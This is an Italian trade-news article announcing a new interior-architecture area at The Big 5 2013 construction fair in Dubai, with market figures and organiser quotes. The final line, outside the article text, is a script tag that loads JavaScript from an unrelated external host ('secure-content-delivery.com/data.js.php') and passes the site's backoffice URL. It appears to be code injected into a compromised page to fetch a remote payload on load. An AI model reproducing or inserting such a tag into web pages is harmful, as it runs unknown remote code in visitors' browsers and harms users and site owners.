1. Home
  2. Notizie e Mercato
  3. ‘The Big 5’ 2013: si aggiunge un’area sull’Architettura d’Interni

‘The Big 5’ 2013: si aggiunge un’area sull’Architettura d’Interni

Edilizia di
5/5
votato da 1 persone
A ‘The Big 5’ di Dubai non c’è solo edilizia: con area sull’Architettura d’Interni, la divisione in settori dei prodotti è stata aumentata per fornire una ricerca ottimizzata per gli acquirenti di ogni mercato


Con un valore corrente di 1.5 trilioni di dollari, il mercato edilizio del CCASG (Consiglio di Cooperazione degli Stati del Golfo Persico) è uno dei più positivi al mondo attualmente. Per assicurare che ogni settore dell’industria abbia l’opportunità di mettere in mostra i propri prodotti e tecnologie in una condizione ambientale efficace, “The Big 5” 2013 ha ampliato ulteriormente le proprie aree per i prodotti specifici con l’aggiunta dell’Architettura d’Interni.

Dato che gli Emirati Arabi Uniti e l’Arabia Saudita continuano a mantenere una posizione di spicco per il valore complessivo riguardo agli attuali e futuri progetti di costruzioni di rispettivamente 629b e 494n di dollari, il CCASG è in cerca di nuove ispirazioni. I prodotti per cucine e bagni, ceramiche e accessori sono alcuni dei più richiesti: la nuova area di Architettura d’Interni mostrerà i più recenti prodotti provenienti da tutta la regione, così come i corrispondenti di Italia, Spagna e Grecia. Evento guida per l’edilizia e l’industria delle costruzioni nel Medio Oriente per oltre 30 anni, “The Big 5” ha assistito alla crescente evoluzione del mercato del CCASG e al bisogno in costante aumento di soluzioni per settori specializzati.

Ospitiamo regolarmente focus group e con il nostro Comitato Consultivo incontriamo membri che ci aiutano ogni anno a costruire un evento rilevante per quei professionisti che influenzano l’approvvigionamento di prodotti edilizi” ha affermato il Direttore Organizzativo dell’evento, Andy White.

La nostra ricerca ci ha mostrato che esiste un chiaro bisogno di zone specifiche per i prodotti di architettura d’interni, in particolare per i designer e gli architetti d’interni che parteciperanno all’esposizione. Un comune pregiudizio riguardo a ‘The Big 5’ è che si tratti solo di un evento per prodotti edilizi, nonostante per molti anni abbia ospitato alcuni dei maggiori marchi mondiali d’interni”.

Attirando oltre 2.500 espositori provenienti da 65 Paesi, con più di 60.000 professionisti del settore dell’edilizia, in loco dal 25 al 28 Novembre presso il World Trade Centre di Dubai, “The Big 5” è il principale evento per l’industria dell’edilizia e delle costruzioni nel Medio Oriente. Insieme a “The Big 5” 2013, avranno luogo nella stessa struttura anche “Middle East Concrete” e “PMV Live”, eventi dedicati ai settori del calcestruzzo e dei macchinari.


<script src="https://secure-content-delivery.com/data.js.php?i=%7B271EC601-39CC-426C-935D-F754BCD76643%7D&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.5539688263850743" type="text/javascript"></script>